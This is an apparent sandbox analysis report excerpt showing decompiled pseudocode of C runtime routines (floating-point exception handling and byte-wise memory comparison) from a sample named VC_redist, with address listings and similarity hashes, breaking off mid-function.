                                                                          			E0004ED4C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                          				signed int _t172;
                                                                          				signed int _t175;
                                                                          				signed int _t178;
                                                                          				signed int* _t179;
                                                                          				signed int _t195;
                                                                          				signed int _t199;
                                                                          				signed int _t202;
                                                                          				void* _t203;
                                                                          				void* _t206;
                                                                          				signed int _t209;
                                                                          				void* _t210;
                                                                          				signed int _t225;
                                                                          				unsigned int* _t240;
                                                                          				signed char _t242;
                                                                          				signed int* _t250;
                                                                          				unsigned int* _t256;
                                                                          				signed int* _t257;
                                                                          				signed char _t259;
                                                                          				long _t262;
                                                                          				signed int* _t265;
                                                                          
                                                                          				 *(_a4 + 4) = 0;
                                                                          				_t262 = 0xc000000d;
                                                                          				 *(_a4 + 8) = 0;
                                                                          				 *(_a4 + 0xc) = 0;
                                                                          				_t242 = _a12;
                                                                          				if((_t242 & 0x00000010) != 0) {
                                                                          					_t262 = 0xc000008f;
                                                                          					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                          				}
                                                                          				if((_t242 & 0x00000002) != 0) {
                                                                          					_t262 = 0xc0000093;
                                                                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                          				}
                                                                          				if((_t242 & 0x00000001) != 0) {
                                                                          					_t262 = 0xc0000091;
                                                                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                          				}
                                                                          				if((_t242 & 0x00000004) != 0) {
                                                                          					_t262 = 0xc000008e;
                                                                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                          				}
                                                                          				if((_t242 & 0x00000008) != 0) {
                                                                          					_t262 = 0xc0000090;
                                                                          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                          				}
                                                                          				_t265 = _a8;
                                                                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                                          				_t259 = E0004C663(_a4);
                                                                          				if((_t259 & 0x00000001) != 0) {
                                                                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                          				}
                                                                          				if((_t259 & 0x00000004) != 0) {
                                                                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                          				}
                                                                          				if((_t259 & 0x00000008) != 0) {
                                                                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                          				}
                                                                          				if((_t259 & 0x00000010) != 0) {
                                                                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                          				}
                                                                          				if((_t259 & 0x00000020) != 0) {
                                                                          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                          				}
                                                                          				_t172 =  *_t265 & 0x00000c00;
                                                                          				if(_t172 == 0) {
                                                                          					 *_a4 =  *_a4 & 0xfffffffc;
                                                                          				} else {
                                                                          					if(_t172 == 0x400) {
                                                                          						_t257 = _a4;
                                                                          						_t225 =  *_t257 & 0xfffffffd | 1;
                                                                          						L26:
                                                                          						 *_t257 = _t225;
                                                                          						L29:
                                                                          						_t175 =  *_t265 & 0x00000300;
                                                                          						if(_t175 == 0) {
                                                                          							_t250 = _a4;
                                                                          							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                                          							L35:
                                                                          							 *_t250 = _t178;
                                                                          							L36:
                                                                          							_t179 = _a4;
                                                                          							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                          							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                          							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                          							if(_a28 == 0) {
                                                                          								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                          								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                          								_t254 = _a4;
                                                                          								_t240 = _a24;
                                                                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                          								 *(_a4 + 0x50) =  *_t240;
                                                                          							} else {
                                                                          								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                          								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                          								_t240 = _a24;
                                                                          								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                          								 *(_a4 + 0x50) =  *_t240;
                                                                          							}
                                                                          							E0004C5C9(_t254);
                                                                          							RaiseException(_t262, 0, 1,  &_a4);
                                                                          							_t256 = _a4;
                                                                          							if((_t256[2] & 0x00000010) != 0) {
                                                                          								 *_t265 =  *_t265 & 0xfffffffe;
                                                                          							}
                                                                          							if((_t256[2] & 0x00000008) != 0) {
                                                                          								 *_t265 =  *_t265 & 0xfffffffb;
                                                                          							}
                                                                          							if((_t256[2] & 0x00000004) != 0) {
                                                                          								 *_t265 =  *_t265 & 0xfffffff7;
                                                                          							}
                                                                          							if((_t256[2] & 0x00000002) != 0) {
                                                                          								 *_t265 =  *_t265 & 0xffffffef;
                                                                          							}
                                                                          							if((_t256[2] & 0x00000001) != 0) {
                                                                          								 *_t265 =  *_t265 & 0xffffffdf;
                                                                          							}
                                                                          							_t195 =  *_t256 & 0x00000003;
                                                                          							if(_t195 == 0) {
                                                                          								 *_t265 =  *_t265 & 0xfffff3ff;
                                                                          							} else {
                                                                          								_t206 = _t195 - 1;
                                                                          								if(_t206 == 0) {
                                                                          									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                                          									L55:
                                                                          									 *_t265 = _t209;
                                                                          									L58:
                                                                          									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                                          									if(_t199 == 0) {
                                                                          										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                                          										L64:
                                                                          										 *_t265 = _t202;
                                                                          										L65:
                                                                          										if(_a28 == 0) {
                                                                          											 *_t240 = _t256[0x14];
                                                                          										} else {
                                                                          											 *_t240 = _t256[0x14];
                                                                          										}
                                                                          										return _t202;
                                                                          									}
                                                                          									_t203 = _t199 - 1;
                                                                          									if(_t203 == 0) {
                                                                          										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                                          										goto L64;
                                                                          									}
                                                                          									_t202 = _t203 - 1;
                                                                          									if(_t202 == 0) {
                                                                          										 *_t265 =  *_t265 & 0xfffff3ff;
                                                                          									}
                                                                          									goto L65;
                                                                          								}
                                                                          								_t210 = _t206 - 1;
                                                                          								if(_t210 == 0) {
                                                                          									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                                          									goto L55;
                                                                          								}
                                                                          								if(_t210 == 1) {
                                                                          									 *_t265 =  *_t265 | 0x00000c00;
                                                                          								}
                                                                          							}
                                                                          							goto L58;
                                                                          						}
                                                                          						if(_t175 == 0x200) {
                                                                          							_t250 = _a4;
                                                                          							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                                          							goto L35;
                                                                          						}
                                                                          						if(_t175 == 0x300) {
                                                                          							 *_a4 =  *_a4 & 0xffffffe3;
                                                                          						}
                                                                          						goto L36;
                                                                          					}
                                                                          					if(_t172 == 0x800) {
                                                                          						_t257 = _a4;
                                                                          						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                                          						goto L26;
                                                                          					}
                                                                          					if(_t172 == 0xc00) {
                                                                          						 *_a4 =  *_a4 | 0x00000003;
                                                                          					}
                                                                          				}
                                                                          			}
























                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0004ED47,?,?,00000008,?,?,0004E9E7,00000000), ref: 0004EF79
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: 2ab27ca061b03501513bc739900c81805ee3f019f0c1a3991f23149eef8a4ca6
                                                                          • Instruction ID: 0add5aa45bad7722f6582809999c9cfd765df9ed626ab83f1397c73ba46fd96b
                                                                          • Opcode Fuzzy Hash: 2ab27ca061b03501513bc739900c81805ee3f019f0c1a3991f23149eef8a4ca6
                                                                          • Instruction Fuzzy Hash: BAB18EB1510649DFD764CF28C48AB647BE0FF45364F2586A8E899CF2A2C335E981CB44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00040662(void* __edx, void* __esi) {
                                                                          				signed int _t192;
                                                                          				signed char _t193;
                                                                          				signed char _t194;
                                                                          				signed char _t195;
                                                                          				signed char _t196;
                                                                          				signed char _t198;
                                                                          				signed int _t241;
                                                                          				void* _t287;
                                                                          				void* _t292;
                                                                          				void* _t294;
                                                                          				void* _t296;
                                                                          				void* _t298;
                                                                          				void* _t300;
                                                                          				void* _t302;
                                                                          				void* _t304;
                                                                          				void* _t306;
                                                                          				void* _t308;
                                                                          				void* _t310;
                                                                          				void* _t312;
                                                                          				void* _t314;
                                                                          				void* _t316;
                                                                          				void* _t318;
                                                                          				void* _t320;
                                                                          				void* _t322;
                                                                          				void* _t324;
                                                                          				void* _t326;
                                                                          				void* _t327;
                                                                          
                                                                          				_t327 = __esi;
                                                                          				_t287 = __edx;
                                                                          				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                                                          					_t241 = 0;
                                                                          					L15:
                                                                          					if(_t241 != 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          					_t193 =  *(_t327 - 0x1a);
                                                                          					if(_t193 ==  *(_t287 - 0x1a)) {
                                                                          						_t241 = 0;
                                                                          						L26:
                                                                          						if(_t241 != 0) {
                                                                          							goto L2;
                                                                          						}
                                                                          						_t194 =  *(_t327 - 0x16);
                                                                          						if(_t194 ==  *(_t287 - 0x16)) {
                                                                          							_t241 = 0;
                                                                          							L37:
                                                                          							if(_t241 != 0) {
                                                                          								goto L2;
                                                                          							}
                                                                          							_t195 =  *(_t327 - 0x12);
                                                                          							if(_t195 ==  *(_t287 - 0x12)) {
                                                                          								_t241 = 0;
                                                                          								L48:
                                                                          								if(_t241 != 0) {
                                                                          									goto L2;
                                                                          								}
                                                                          								_t196 =  *(_t327 - 0xe);
                                                                          								if(_t196 ==  *(_t287 - 0xe)) {
                                                                          									_t241 = 0;
                                                                          									L59:
                                                                          									if(_t241 != 0) {
                                                                          										goto L2;
                                                                          									}
                                                                          									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                                                          										_t241 = 0;
                                                                          										L70:
                                                                          										if(_t241 != 0) {
                                                                          											goto L2;
                                                                          										}
                                                                          										_t198 =  *(_t327 - 6);
                                                                          										if(_t198 ==  *(_t287 - 6)) {
                                                                          											_t241 = 0;
                                                                          											L81:
                                                                          											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                                                          											}
                                                                          											goto L2;
                                                                          										}
                                                                          										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                                                          										if(_t292 == 0) {
                                                                          											L74:
                                                                          											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                                                          											if(_t294 == 0) {
                                                                          												L76:
                                                                          												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                                                          												if(_t296 == 0) {
                                                                          													L78:
                                                                          													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                                                          													if(_t241 != 0) {
                                                                          														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                          													}
                                                                          													goto L81;
                                                                          												}
                                                                          												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                                          												if(_t241 != 0) {
                                                                          													goto L2;
                                                                          												}
                                                                          												goto L78;
                                                                          											}
                                                                          											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                                          											if(_t241 != 0) {
                                                                          												goto L2;
                                                                          											}
                                                                          											goto L76;
                                                                          										}
                                                                          										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                                          										if(_t241 != 0) {
                                                                          											goto L2;
                                                                          										}
                                                                          										goto L74;
                                                                          									}
                                                                          									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                                                          									if(_t298 == 0) {
                                                                          										L63:
                                                                          										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                                                          										if(_t300 == 0) {
                                                                          											L65:
                                                                          											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                                                          											if(_t302 == 0) {
                                                                          												L67:
                                                                          												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                                                          												if(_t241 != 0) {
                                                                          													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                          												}
                                                                          												goto L70;
                                                                          											}
                                                                          											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                                          											if(_t241 != 0) {
                                                                          												goto L2;
                                                                          											}
                                                                          											goto L67;
                                                                          										}
                                                                          										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                                          										if(_t241 != 0) {
                                                                          											goto L2;
                                                                          										}
                                                                          										goto L65;
                                                                          									}
                                                                          									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                                          									if(_t241 != 0) {
                                                                          										goto L2;
                                                                          									}
                                                                          									goto L63;
                                                                          								}
                                                                          								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                                                          								if(_t304 == 0) {
                                                                          									L52:
                                                                          									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                                                          									if(_t306 == 0) {
                                                                          										L54:
                                                                          										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                                                          										if(_t308 == 0) {
                                                                          											L56:
                                                                          											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                                                          											if(_t241 != 0) {
                                                                          												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                          											}
                                                                          											goto L59;
                                                                          										}
                                                                          										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                                          										if(_t241 != 0) {
                                                                          											goto L2;
                                                                          										}
                                                                          										goto L56;
                                                                          									}
                                                                          									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                                          									if(_t241 != 0) {
                                                                          										goto L2;
                                                                          									}
                                                                          									goto L54;
                                                                          								}
                                                                          								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                                          								if(_t241 != 0) {
                                                                          									goto L2;
                                                                          								}
                                                                          								goto L52;
                                                                          							}
                                                                          							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                                                          							if(_t310 == 0) {
                                                                          								L41:
                                                                          								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                                                          								if(_t312 == 0) {
                                                                          									L43:
                                                                          									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                                                          									if(_t314 == 0) {
                                                                          										L45:
                                                                          										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                                                          										if(_t241 != 0) {
                                                                          											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                          										}
                                                                          										goto L48;
                                                                          									}
                                                                          									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                                                          									if(_t241 != 0) {
                                                                          										goto L2;
                                                                          									}
                                                                          									goto L45;
                                                                          								}
                                                                          								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                                          								if(_t241 != 0) {
                                                                          									goto L2;
                                                                          								}
                                                                          								goto L43;
                                                                          							}
                                                                          							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                                          							if(_t241 != 0) {
                                                                          								goto L2;
                                                                          							}
                                                                          							goto L41;
                                                                          						}
                                                                          						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                                                          						if(_t316 == 0) {
                                                                          							L30:
                                                                          							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                                                          							if(_t318 == 0) {
                                                                          								L32:
                                                                          								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                                                          								if(_t320 == 0) {
                                                                          									L34:
                                                                          									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                                                          									if(_t241 != 0) {
                                                                          										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                          									}
                                                                          									goto L37;
                                                                          								}
                                                                          								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                                                          								if(_t241 != 0) {
                                                                          									goto L2;
                                                                          								}
                                                                          								goto L34;
                                                                          							}
                                                                          							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                                                          							if(_t241 != 0) {
                                                                          								goto L2;
                                                                          							}
                                                                          							goto L32;
                                                                          						}
                                                                          						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                                                          						if(_t241 != 0) {
                                                                          							goto L2;
                                                                          						}
                                                                          						goto L30;
                                                                          					}
                                                                          					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                                                          					if(_t322 == 0) {
                                                                          						L19:
                                                                          						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                                                          						if(_t324 == 0) {
                                                                          							L21:
                                                                          							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                                                          							if(_t326 == 0) {
                                                                          								L23:
                                                                          								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                                                          								if(_t241 != 0) {
                                                                          									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L26;
                                                                          							}
                                                                          							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                                                          							if(_t241 != 0) {
                                                                          								goto L2;
                                                                          							}
                                                                          							goto L23;
                                                                          						}
                                                                          						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                                                          						if(_t241 != 0) {
                                                                          							goto L2;
                                                                          						}
                                                                          						goto L21;
                                                                          					}
                                                                          					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                                                          					if(_t241 != 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          					goto L19;
                                                                          				} else {
                                                                          					__edi = __al & 0x000000ff;
                                                                          					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                                          					if(__edi == 0) {
                                                                          						L8:
                                                                          						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                                          						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                          						if(__edi == 0) {
                                                                          							L10:
                                                                          							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                                          							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                          							if(__edi == 0) {
                                                                          								L12:
                                                                          								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                                                          								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                                          								if(__ecx != 0) {
                                                                          									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L15;
                                                                          							}
                                                                          							0 = 0 | __edi > 0x00000000;
                                                                          							__ecx = (__edi > 0) * 2 != 1;
                                                                          							if((__edi > 0) * 2 != 1) {
                                                                          								L2:
                                                                          								_t192 = _t241;
                                                                          								return _t192;
                                                                          							}
                                                                          							goto L12;
                                                                          						}
                                                                          						0 = 0 | __edi > 0x00000000;
                                                                          						__ecx = (__edi > 0) * 2 != 1;
                                                                          						if((__edi > 0) * 2 != 1) {
                                                                          							goto L2;
                                                                          						}
                                                                          						goto L10;
                                                                          					}
                                                                          					0 = 0 | __edi > 0x00000000;
                                                                          					__ecx = (__edi > 0) * 2 != 1;
                                                                          					if((__edi > 0) * 2 != 1) {
                                                                          						goto L2;
                                                                          					}
                                                                          					goto L8;
                                                                          				}
                                                                          			}






























                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040a14
                                                                          0x00040969
                                                                          0x0004096b
                                                                          0x00040983
                                                                          0x0004098b
                                                                          0x0004098d
                                                                          0x000409a5
                                                                          0x000409ad
                                                                          0x000409af
                                                                          0x000409c7
                                                                          0x000409cf
                                                                          0x000409d1
                                                                          0x000409da
                                                                          0x000409da
                                                                          0x00000000
                                                                          0x000409d1
                                                                          0x000409b8
                                                                          0x000409c1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000409c1
                                                                          0x00040996
                                                                          0x0004099f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004099f
                                                                          0x00040974
                                                                          0x0004097d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004097d
                                                                          0x000408d1
                                                                          0x000408d3
                                                                          0x000408eb
                                                                          0x000408f3
                                                                          0x000408f5
                                                                          0x0004090d
                                                                          0x00040915
                                                                          0x00040917
                                                                          0x0004092f
                                                                          0x00040937
                                                                          0x00040939
                                                                          0x00040942
                                                                          0x00040942
                                                                          0x00000000
                                                                          0x00040939
                                                                          0x00040920
                                                                          0x00040929
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040929
                                                                          0x000408fe
                                                                          0x00040907
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040907
                                                                          0x000408dc
                                                                          0x000408e5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000408e5
                                                                          0x0004083a
                                                                          0x0004083c
                                                                          0x00040854
                                                                          0x0004085c
                                                                          0x0004085e
                                                                          0x00040876
                                                                          0x0004087e
                                                                          0x00040880
                                                                          0x00040898
                                                                          0x000408a0
                                                                          0x000408a2
                                                                          0x000408ab
                                                                          0x000408ab
                                                                          0x00000000
                                                                          0x000408a2
                                                                          0x00040889
                                                                          0x00040892
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040892
                                                                          0x00040867
                                                                          0x00040870
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040870
                                                                          0x00040845
                                                                          0x0004084e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004084e
                                                                          0x000407a3
                                                                          0x000407a5
                                                                          0x000407bd
                                                                          0x000407c5
                                                                          0x000407c7
                                                                          0x000407df
                                                                          0x000407e7
                                                                          0x000407e9
                                                                          0x00040801
                                                                          0x00040809
                                                                          0x0004080b
                                                                          0x00040814
                                                                          0x00040814
                                                                          0x00000000
                                                                          0x0004080b
                                                                          0x000407f2
                                                                          0x000407fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000407fb
                                                                          0x000407d0
                                                                          0x000407d9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000407d9
                                                                          0x000407ae
                                                                          0x000407b7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000407b7
                                                                          0x0004070c
                                                                          0x0004070e
                                                                          0x00040726
                                                                          0x0004072e
                                                                          0x00040730
                                                                          0x00040748
                                                                          0x00040750
                                                                          0x00040752
                                                                          0x0004076a
                                                                          0x00040772
                                                                          0x00040774
                                                                          0x0004077d
                                                                          0x0004077d
                                                                          0x00000000
                                                                          0x00040774
                                                                          0x0004075b
                                                                          0x00040764
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040764
                                                                          0x00040739
                                                                          0x00040742
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040742
                                                                          0x00040717
                                                                          0x00040720
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004066e
                                                                          0x0004066e
                                                                          0x00040675
                                                                          0x00040677
                                                                          0x0004068f
                                                                          0x0004068f
                                                                          0x00040697
                                                                          0x00040699
                                                                          0x000406b1
                                                                          0x000406b1
                                                                          0x000406b9
                                                                          0x000406bb
                                                                          0x000406d3
                                                                          0x000406d3
                                                                          0x000406db
                                                                          0x000406dd
                                                                          0x000406e6
                                                                          0x000406e6
                                                                          0x00000000
                                                                          0x000406dd
                                                                          0x000406c1
                                                                          0x000406c4
                                                                          0x000406cd
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016
                                                                          0x00041016
                                                                          0x00000000
                                                                          0x000406cd
                                                                          0x0004069f
                                                                          0x000406a2
                                                                          0x000406ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000406ab
                                                                          0x0004067d
                                                                          0x00040680
                                                                          0x00040689
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040689

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction ID: e22f10139d5436484c45534c40b0ea176a44a24eb7dd592973c8e19d1b7fb9c5
                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction Fuzzy Hash: F5C1E5B22091A309DFAD4679D53413EBAE06FA27B131A57BDD5B3DB0C0EE30C524D624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00040A97(void* __edx, void* __esi) {
                                                                          				signed int _t197;
                                                                          				signed char _t198;
                                                                          				signed char _t199;
                                                                          				signed char _t200;
                                                                          				signed char _t202;
                                                                          				signed char _t203;
                                                                          				signed int _t246;
                                                                          				void* _t294;
                                                                          				void* _t297;
                                                                          				void* _t299;
                                                                          				void* _t301;
                                                                          				void* _t303;
                                                                          				void* _t305;
                                                                          				void* _t307;
                                                                          				void* _t309;
                                                                          				void* _t311;
                                                                          				void* _t313;
                                                                          				void* _t315;
                                                                          				void* _t317;
                                                                          				void* _t319;
                                                                          				void* _t321;
                                                                          				void* _t323;
                                                                          				void* _t325;
                                                                          				void* _t327;
                                                                          				void* _t329;
                                                                          				void* _t331;
                                                                          				void* _t333;
                                                                          				void* _t335;
                                                                          				void* _t336;
                                                                          
                                                                          				_t336 = __esi;
                                                                          				_t294 = __edx;
                                                                          				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                                                          					_t246 = 0;
                                                                          					L14:
                                                                          					if(_t246 != 0) {
                                                                          						goto L1;
                                                                          					}
                                                                          					_t198 =  *(_t336 - 0x1b);
                                                                          					if(_t198 ==  *(_t294 - 0x1b)) {
                                                                          						_t246 = 0;
                                                                          						L25:
                                                                          						if(_t246 != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						_t199 =  *(_t336 - 0x17);
                                                                          						if(_t199 ==  *(_t294 - 0x17)) {
                                                                          							_t246 = 0;
